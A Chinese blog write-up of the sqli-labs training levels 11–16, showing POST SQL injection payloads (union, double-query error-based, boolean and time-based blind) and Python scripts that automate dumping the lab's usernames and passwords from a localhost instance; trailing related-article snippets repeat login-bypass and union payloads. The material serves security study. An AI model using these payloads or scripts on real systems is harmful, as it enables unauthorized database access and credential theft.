sqli-labs less11-16

最新推荐文章于 2024-12-07 22:47:31 发布
原创 最新推荐文章于 2024-12-07 22:47:31 发布 · 335 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Web安全 #SQL注入

本文深入探讨了基于字符串的SQL注入攻击方法,包括如何利用错误信息进行查询语句构造,以及如何通过不同类型的注入(如基于布尔和时间的盲注)获取数据库信息。文章提供了具体的payload构造示例和Python脚本,展示了如何自动化地从数据库中提取用户名和密码。

LESS 11 基于字符串的注入(POST)

在username栏输入单引号’测试,结果:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’’’ and password=’’ LIMIT 0,1’ at line 1

猜测查询语句为:select * from users where username = ‘$username’ and password=’$password’ LIMIT 0,1
于是乎构造payload:

Username : 0’ union select group_concat(username),group_concat(password) from users#
Password :

结果:

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

LESS 12 基于双引号字符串的注入(POST)

和上一关的不同在于字符串被双引号和括号包围,通过报错讯息可以知道
payload如下:

Username : 0”) union select group_concat(username),group_concat(password) from users#
Password :

LESS 13 双查询注入(POST)

通过报错信息可以知道字符串被一对单引号和一对括号包围,但是成功后不显示信息,只会显示报错信息,于是使用双查询注入:

Username : 0’) union select count(), CONCAT_WS(CHAR(32,58,32),(select count() from users),floor(rand()*2)) as a from users group by a#
Password :

结果:

Duplicate entry ‘13 : 1’ for key ‘group_key’’

可以构造脚本爆表:

from urllib import request
from urllib import parse
import re

url = "http://localhost/sqli-labs-master/Less-13/"

i = 0
while(i < 13):
    data = {"uname":"0') union select count(*), CONCAT_WS(CHAR(32,124,32),(select username from users limit "+str(i)+",1),(select password from users limit "+str(i)+",1),floor(rand()*2)) as a from users group by a#", "passwd":""}
    response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
    info = re.search(r"[^']+\s\|\s[^\s]+?", response)
    if(info == None):
        i -= 1
    else:
        print(info.group())
    i += 1

 

结果:

Dumb | Dumb | 0
Angelina | I-kill-you | 1
Dummy | p@ssword | 0
secure | crappy | 1
stupid | stupidity | 1
superman | genious | 0
batman | mob!le | 1
admin | admin | 0
admin1 | admin1 | 0
admin2 | admin2 | 1
admin3 | admin3 | 1
dhakkan | dumbo | 1
admin4 | admin4 | 0

LESS 14 双引号双查询注入(POST)

除了把单引号括号改成双引号外和上一关没什么区别,payload:

Username : 0” union select count(), CONCAT_WS(CHAR(32,58,32),(select count() from users),floor(rand()*2)) as a from users group by a#
Password :

其他的和十三关都是一样的

LESS 15 基于布尔的盲注(POST)

POST盲注,第七关的脚本拿过来改一下即可:

from urllib import request
from urllib import parse
import re

url = "http://localhost/sqli-labs-master/Less-15/"

def getLength(value):
    length = 0
    while True:
        data = {"uname":"' or length("+str(value)+")="+str(length)+"#", "passwd":""}
        response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
        if (re.search("slap", response)):
            length += 1
        else:
            return length

def getName(value):
    dbname = ""
    for n in range(getLength(value)):
        a = 64
        b = 64
        #使用二分法构造动态参数
        while True:
            b = int(b/2)
            data = {"uname":"' or ascii(substr(" + value + "," + str(n+1) + "))<" + str(a) + "#", "passwd":""}
            response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
            if (re.search("slap", response)):
                data["uname"] = "' or ascii(substr(" + value + "," + str(n+1) + "))=" + str(a) + "#"
                response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
                if (re.search("slap", response)):
                    a += b
                else:
                    dbname = dbname + chr(a)
                    break
            else:
                a -= b
    return dbname

print(getName("(select group_concat(username) from users)"))
print(getName("(select group_concat(password) from users)"))

 

结果和第八关一样

LESS 16 基于时间的盲注(POST)

结合第九关的脚本,再改一下上一关的脚本就成了本关的脚本:

from urllib import request
from urllib import parse
import time

url = "http://localhost/sqli-labs-master/Less-15/"

def getLength(value):
    length = 0
    while True:
        data = {"uname":"' or if(length("+value+")="+str(length)+",sleep(0.1),1)#", "passwd":""}
        t = time.time()
        request.urlopen(url, parse.urlencode(data).encode()).read().decode()
        if (time.time()-t <= 0.1):
            length += 1
        else:
            return length

def getName(value):
    dbname = ""
    for n in range(getLength(value)):
        a = 64
        b = 64
        #使用二分法构造动态参数
        while True:
            b = int(b/2)
            data = {"uname":"' or if(ascii(substr("+value+","+str(n+1)+"))<"+str(a)+",sleep(0.1),1)#", "passwd":""}
            t = time.time()
            request.urlopen(url, parse.urlencode(data).encode()).read().decode()
            if (time.time()-t <= 0.1):
                data["uname"] = "' or if(ascii(substr("+value+","+str(n+1)+"))="+str(a)+",sleep(0.1),1)#"
                t = time.time()
                request.urlopen(url, parse.urlencode(data).encode()).read().decode()
                if (time.time()-t <= 0.1):
                    a += b
                else:
                    dbname = dbname + chr(a)
                    break
            else:
                a -= b
    return dbname

print(getName("(select group_concat(username) from users)"))
print(getName("(select group_concat(password) from users)"))

速度太慢,不知道有什么好的改进方法

https://soporbear.github.io/2018/05/29/sqli-labs-less11/

sqli-labs:Less-11-Less-20
打代码的小女孩
12-23 738
Less-11~Less-20是post型注入,一般都是登陆绕过,当然也是可以获取数据库的信息。
sqli-labs less-16 post提交dnslog注入
wanggonghanfei的博客
10-07 1293
sqli-labs less-16 post提交dnslog注入
sqli-labs (less-16)
kukudeshuo的博客
03-11 949
sqli-labs (less-16) 进入16关,输入用户名和密码,可以看到没有数据回显 输入 uname=admin'&passwd=admin&submit=Submit #没有错误回显 uname=admin"&passwd=admin&submit=Submit #没有错误回显 没有错误回显,我们只能一个一个去猜闭合方式,利用时间盲注去判断注入点 uname=admin' and sleep(5)#&passwd=admin&submit=Su
sqli-labs (less15-less16)
Xi4or0uji
07-31 1189
less 15 post方法单引号时间盲注 这关跟之前的get方法的盲注差不多,具体就不多解释了,因为后台的查询语句是select xxx from "table_name" where uname='$_POST["uname"]' and passwd='$_POST["passwd"]' 所以只要构造uname=admin'绕过就行了 贴个爆数据库的脚本,其他的改下sql语句就能用了...
sqli-labs ————less -11(POST注入
Fly_鹏程万里
05-11 4461
前言从这一关开始,我们就进入到了POST注入的世界了。在接下来的几关中我们将陆续介绍关于POST注入的方法以及技巧。POSTpost是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如,我们常常使用的用户登录模块、网站的留言板模块等,在这些功能模块中我们提交的数据都是以post的方式提交的服务器的,之后再由服务器端进行验证。Less-11关卡界面:我们首先提交一个admin试试看会有什么...
sqli-labs-master【Less-11/12/13/14/15/16
weixin_44352521的博客
12-18 499
Less-11 进入Less-11之后,可以看到是全新的关卡,是一个表单的形式,需要我们填入用户名和密码才可以提交,首先我们随便填入一个用户名和密码看页面会回显给我们什么内容? 我在这块用户名和密码都输入的是123,可以看到登陆尝试失败,不过这都不是重点,我们观察一下地址栏这块,我们提交的数据并没有体现在url中,说明11关是POST注入,那么什么是POST注入呢?就是数据从客户端提交到服务器...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 2002
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs less-26 空格绕过
wanggonghanfei的博客
10-13 1141
sqli-labs less-26 空格绕过
Sqli-labs Less32-Less33 宽字节注入
beiweixiaotian66的博客
07-25 987
一丢丢Sqli-labs小练习
SQLi-Labs Less11-Less16
KRDecad3的博客
12-05 405
Less-11-POST-Error Based-Single quotes-String username栏输入一个单引号报错: 说明查询语句有username='$_POST[username]' and password='$_POST[password]',查询有两个字段 username栏输入 ' or 1=1# 提交,绕过登陆验证,并且知道两处可以回显。 构造查询数据库名: '...
sqli-labsLess-16——Less-20)解题过程
weixin_46204746的博客
02-16 778
Less-16 先尝试输入admn,显示登录成功,但是没有返回信息,又然后尝试输入:uname=admin") or 1=1#&passwd=admin&submit=Submit,回显成功,同样也没有返回信息,与15题的做法相同,使用盲注 爆数据库名:uname=1") or (select ascii(substr(database(),1,1)) >110)#&...
sqlilabs靶场:less-11--less-15
2302_80256359的博客
12-07 916
sqlilabs靶场第11关到第15关通关超详细步骤
sqli-labs-master通关之LESS11-LESS16
weixin_43726831的博客
10-10 682
SQL注入sqli-labs-master LESS11-LESS16 less11-16关中,是最基本的POST交互方式下的注入 包括联合查询法,报错型注入,以及布尔型盲注,在此博文中,对其详细过程没有做记录,但是万变不离其宗,这是建立在GET交互方式之上的,所以其方法同GET交互方式下的查询方法类似 联合查询法 报错型注入 布尔型盲注 时间性盲注 LESS-1111关 1.通过WEB页面...
sqli-labs靶场练习Less-11~20(持续更新)--ch4nge
ch4nge
10-26 997
Less11-19 作者:ch4nge 目录Less11-19Less11·post·U手注sqlmapLess12·post·ULess13·post·E手注sqlmapLess 14·post·ELess15·post·BLess16·post·BLess 17·post·ELess 18·UA·E解法1解法2sqlmapLess19·referer·E Less11·post·U 手注 这道题给出来了一个登录框 源码: @$sql="SELECT username, password FROM us
sqli-labs:Less-1-Less-10
打代码的小女孩
11-17 1044
less 1 ~less 10都是get型的 less 1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 我们得到了登陆名 Dumb 和密码 Dump。我们在URL上添加了一个参数,并让这个参数指向第一条记录。这是便生成了一个从浏览器到数据库的表中的一个快速的查询,从而来获取“id=1”的记录。同样,你可以构造查询...
sqli-labs-master第十一、十二关
m_ing
05-12 1680
前言:我们前十关研究的是get方式注入,我们这里要明确一个概念,GET和POST的数据交流方式:GET是从服务器上获取数据,POST是向服务器传送数据。从第十一关开始就是POST方式交互数据,也就是向服务器传送数据 先查看第十一关页面: http://192.168.89.134/sqli-labs-master/Less-11/ 访问我们的十一关,是一个登陆页面,通常post传送不能在url上看到数据,只能通过抓包工具进行查看等等 我们先尝试一下输入一个’看看怎么反应 我们那错误分析一波 这样一来就非
sqli-labs学习笔记 DAY3
极客剑寮
02-19 236
sqli-labs学习笔记 DAY3 DAY 3 sqli-labs lesson 6 同lesson 5,只是把单引号改为双引号 sqli-labs lesson 7 同lesson 5,只是把单引号后面加两个空格,使用Burpsuit时,需要对结果进行匹配 这一关主要要学习的是sql种into outfile这个命令...
sqli-labs (less11-less14)
Xi4or0uji
07-29 1638
less 11 post方法单引号绕过报错注入 这关跟之前get方法的差不了多少,只是get方法换成了post方法 post数据uname=1' union select 1,group_concat(schema_name) from information_schema.schemata#&amp;passwd=1可以得到 uname=1' union select 1,group...
sqli-labs less-11
最新发布
12-06
SQLi - Labs 是一个用于学习和实践 SQL 注入漏洞的实验环境,Less - 11 是其中一个特定的关卡,主要涉及基于 POST 请求的 SQL 注入场景。 ### 环境准备 在开始使用 Less - 11 之前,需要搭建好 SQLi - Labs 环境。通常可以从 GitHub 上下载 SQLi - Labs 项目,然后将其部署到支持 PHP 和 MySQL 的服务器环境中,如 XAMPP、WAMP 等。 ### Less - 11 漏洞概述 Less - 11 模拟了一个登录表单,用户输入用户名和密码后,系统会通过 POST 请求将数据发送到服务器进行验证。该关卡存在 SQL 注入漏洞,攻击者可以通过构造恶意的用户名和密码来绕过正常的身份验证机制,甚至获取数据库中的敏感信息。 ### 漏洞利用步骤 #### 1. 确定注入点 首先,打开 Less - 11 的登录页面,输入任意的用户名和密码进行登录尝试。观察页面的响应,当输入错误的用户名和密码时,页面会提示“Login failed”。这表明服务器端在处理登录请求时,可能直接将用户输入的内容拼接到 SQL 查询语句中,从而存在 SQL 注入的可能性。 #### 2. 构造注入 payload - **绕过登录验证**:可以尝试使用以下 payload 来绕过登录验证。在用户名输入框中输入 `' or '1'='1`,密码输入框中可以输入任意内容,如 `test`。这个 payload 的原理是将 SQL 查询语句修改为一个永远为真的条件,从而绕过了正常的用户名和密码验证。 ```plaintext username=' or '1'='1&password=test ``` - **获取数据库信息**:如果要获取数据库的相关信息,可以使用更复杂的 payload。例如,使用联合查询来获取数据库名、表名和列名等信息。 ```plaintext username=' union select 1, database(), 3 -- &password=test ``` 这个 payload 会将查询结果中的数据库名显示在页面上。 #### 3. 提取数据 通过不断构造不同的联合查询 payload,可以逐步提取数据库中的数据。例如,获取表名: ```plaintext username=' union select 1, group_concat(table_name), 3 from information_schema.tables where table_schema=database() -- &password=test ``` 获取列名: ```plaintext username=' union select 1, group_concat(column_name), 3 from information_schema.columns where table_schema=database() and table_name='users' -- &password=test ``` 获取具体数据: ```plaintext username=' union select 1, group_concat(id, ',', username, ',', password), 3 from users -- &password=test ``` ### 注意事项 - 在进行 SQL 注入实验时,务必确保是在合法的测试环境中进行,避免对生产环境造成破坏。 - 不同的数据库系统(如 MySQL、Oracle、SQL Server 等)对 SQL 语法的支持可能有所不同,需要根据实际情况调整 payload。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值